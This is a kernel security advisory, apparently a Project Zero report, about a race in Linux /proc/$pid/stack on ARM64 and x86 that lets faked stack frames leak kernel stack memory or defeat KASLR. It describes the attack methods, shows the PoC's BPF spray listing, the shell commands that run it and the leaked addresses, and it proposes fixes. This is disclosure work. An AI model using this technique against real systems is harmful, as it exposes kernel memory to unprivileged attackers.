Linux: semi-arbitrary task stack read on ARM64 (and x86) via /proc/$pid/stack This issue probably had the most impact on ARM64 kernels before commit e01e80634ecd ("fork: unconditionally clear stack on fork", first in v4.17); luckily, that hardening patch was backported all the way to v4.4 (but not v3.16), so most systems probably have that patch already. On both ARM64 and x86, /proc/$pid/stack can be used to inspect the symbolized kernel stack of a task that is concurrently executing on another CPU. (x86 has a check, but that check is racy, and a comment also documents that it is racy.) This means that the kernel can potentially attempt to unwind an active task stack starting from an outdated frame pointer, causing the kernel to interpret new stack contents (potentially user-supplied data) as a stack frame. On both x86 and ARM64, the kernel ensures that only stack frames inside the target's task stack area are dereferenced. On x86, it is also ensured that only stack frames whose saved instruction pointer points to some valid text section are printed; on ARM64, stack frames are printed independent of where the saved instruction pointer points. The format string element used for printing such stack traces is "%pB", which is normally used for writing information about kernel crashes to the console; on kernels with CONFIG_KALLSYMS, it is implemented by sprint_backtrace(), which falls back to printing raw addresses with "0x%lx" when an address can't be mapped to a symbol. On ARM64, the kernel ensures that stack frames are 16-byte-aligned. This leads to two potential attacks: 1. An attacker can fake a stack frame with a controlled fake instruction pointer and observe to which symbol the kernel maps it. This could be used both to break kernel text ASLR and (if the attacker doesn't have access to the kernel image anyway) to gain more fine-grained information about the layout of kernel code. 2. An attacker can fake a stack frame that points to an arbitrary location in the task stack (subject to alignment constraints) in order to leak data stored at that address into the stack trace returned to userspace. (This is more practical on ARM64, but might also work on x86 if you only need to leak one byte at a time.) 3. A from my perspective relatively boring DoS: It looks as if building a loop out of stackframes whose saved instruction pointers point into scheduler code will send the task that's attempting to read /proc/$pid/stack into an endless loop. I have written a PoC for attack 2 and tested it on a Raspberry Pi 3, using a custom 64-bit build of the Raspberry Pi kernel (based on 4.18.y) with CONFIG_BPF_SYSCALL manually enabled (because I'm too lazy to search for a more normal way to spray things on the kernel stack in the right places), built with gcc 7.2.0. I have attached the PoC as pipe_read.c. The PoC leaks the BPF frame pointer. Usage: In terminal 1: ============== pi@raspberrypi:~/stack_dump$ gcc -o pipe_read pipe_read.c -pthread && ./pipe_read ========================== 0: (18) r0 = 0xbadbeefbadbeef00 2: (bf) r1 = r10 3: (07) r1 += -24 4: (7b) *(u64 *)(r10 -16) = r10 5: (7b) *(u64 *)(r10 -40) = r1 6: (7b) *(u64 *)(r10 -48) = r0 7: (7b) *(u64 *)(r10 -56) = r1 8: (7b) *(u64 *)(r10 -64) = r0 9: (7b) *(u64 *)(r10 -72) = r1 10: (7b) *(u64 *)(r10 -80) = r0 11: (7b) *(u64 *)(r10 -88) = r1 12: (7b) *(u64 *)(r10 -96) = r0 13: (7b) *(u64 *)(r10 -104) = r1 14: (7b) *(u64 *)(r10 -112) = r0 15: (7b) *(u64 *)(r10 -120) = r1 16: (7b) *(u64 *)(r10 -128) = r0 17: (7b) *(u64 *)(r10 -136) = r1 18: (7b) *(u64 *)(r10 -144) = r0 19: (7b) *(u64 *)(r10 -152) = r1 20: (7b) *(u64 *)(r10 -160) = r0 21: (7b) *(u64 *)(r10 -168) = r1 22: (7b) *(u64 *)(r10 -176) = r0 23: (7b) *(u64 *)(r10 -184) = r1 24: (7b) *(u64 *)(r10 -192) = r0 25: (7b) *(u64 *)(r10 -200) = r1 26: (7b) *(u64 *)(r10 -208) = r0 27: (7b) *(u64 *)(r10 -216) = r1 [...] 1920: (7b) *(u64 *)(r10 -480) = r0 1921: (7b) *(u64 *)(r10 -488) = r1 1922: (7b) *(u64 *)(r10 -496) = r0 1923: (7b) *(u64 *)(r10 -504) = r1 1924: (7b) *(u64 *)(r10 -512) = r0 1925: (b7) r0 = 0 1926: (95) exit processed 1926 insns (limit 131072), stack depth 512 ========================== ============== In terminal 2: ============== $ while true; do cat /proc/$(pgrep pipe_read)/stack; done |grep -A1 badbeef [...] [<0>] 0xbadbeefbadbeef00 [<0>] 0xffffff800e5cbb78 -- [<0>] 0xbadbeefbadbeef00 [<0>] 0xffffff800e5cbb78 -- [<0>] 0xbadbeefbadbeef00 [<0>] 0xffffff800e5cbb78 -- [<0>] 0xbadbeefbadbeef00 [<0>] 0xffffff800e5cbb78 -- [<0>] 0xbadbeefbadbeef00 [<0>] 0xffffff800e5cbb78 -- [<0>] 0xbadbeefbadbeef00 [<0>] 0xffffff800e5cbb78 -- [<0>] 0xbadbeefbadbeef00 [<0>] 0xffffff800e5cbb78 -- [<0>] 0xbadbeefbadbeef00 [<0>] 0xffffffdf36987000 -- [<0>] 0xbadbeefbadbeef00 [<0>] 0xffffff800e5cbb78 -- [<0>] 0xbadbeefbadbeef00 [<0>] 0xffffff800e5cbb78 -- [<0>] 0xbadbeefbadbeef00 [<0>] 0xffffff800e5cbb78 -- [<0>] 0xbadbeefbadbeef00 [<0>] 0xffffff800e5cbb78 -- [<0>] 0xbadbeefbadbeef00 [<0>] 0xffffffdf36987000 [...] ============== In terminal 3 (note that this requires kernel.kptr_restrict==1, kptr_restrict=0 prints garbage): ============== # grep _do_fork /proc/vmallocinfo | grep 0xffffff800e5c 0xffffff800e5c8000-0xffffff800e5cd000 20480 _do_fork+0xe8/0x420 pages=4 vmalloc # ============== I'm not sure what the best fix for this is. 32-bit ARM is playing it safe and just refuses to print stack traces for non-current tasks if CONFIG_SMP is on: ============== if (tsk != current) { #ifdef CONFIG_SMP /* * What guarantees do we have here that 'tsk' is not * running on another CPU? For now, ignore it as we * can't guarantee we won't explode. */ if (trace->nr_entries < trace->max_entries) trace->entries[trace->nr_entries++] = ULONG_MAX; return; #else ============== With my "annoying security person" hat on: Would it make sense to just gate proc_pid_stack() on file_ns_capable(m->file, &init_user_ns, CAP_SYS_ADMIN)? That way, even if the unwind code gets some edgecase wrong, it won't cause the disclosure of kernel memory to userspace. If this code should continue to work without CAP_SYS_ADMIN, solving the issue is probably not so straightforward... One approach would be to fire an IPI to request that the target task dumps its own stack. Another approach might be to, between every time a pointer is read from the target's stack and it is dereferenced, check somehow whether the target task has been scheduled in the maintime. Perhaps by checking p->nvcsw, p->nivcsw and p->on_cpu, if that works without races? The reason why I'd like to have more than just one check at the end for this approach are (non-speculative) side channels. This bug is subject to a 90 day disclosure deadline. After 90 days elapse or a patch has been made broadly available (whichever is earlier), the bug report will become visible to the public. Found by: jannh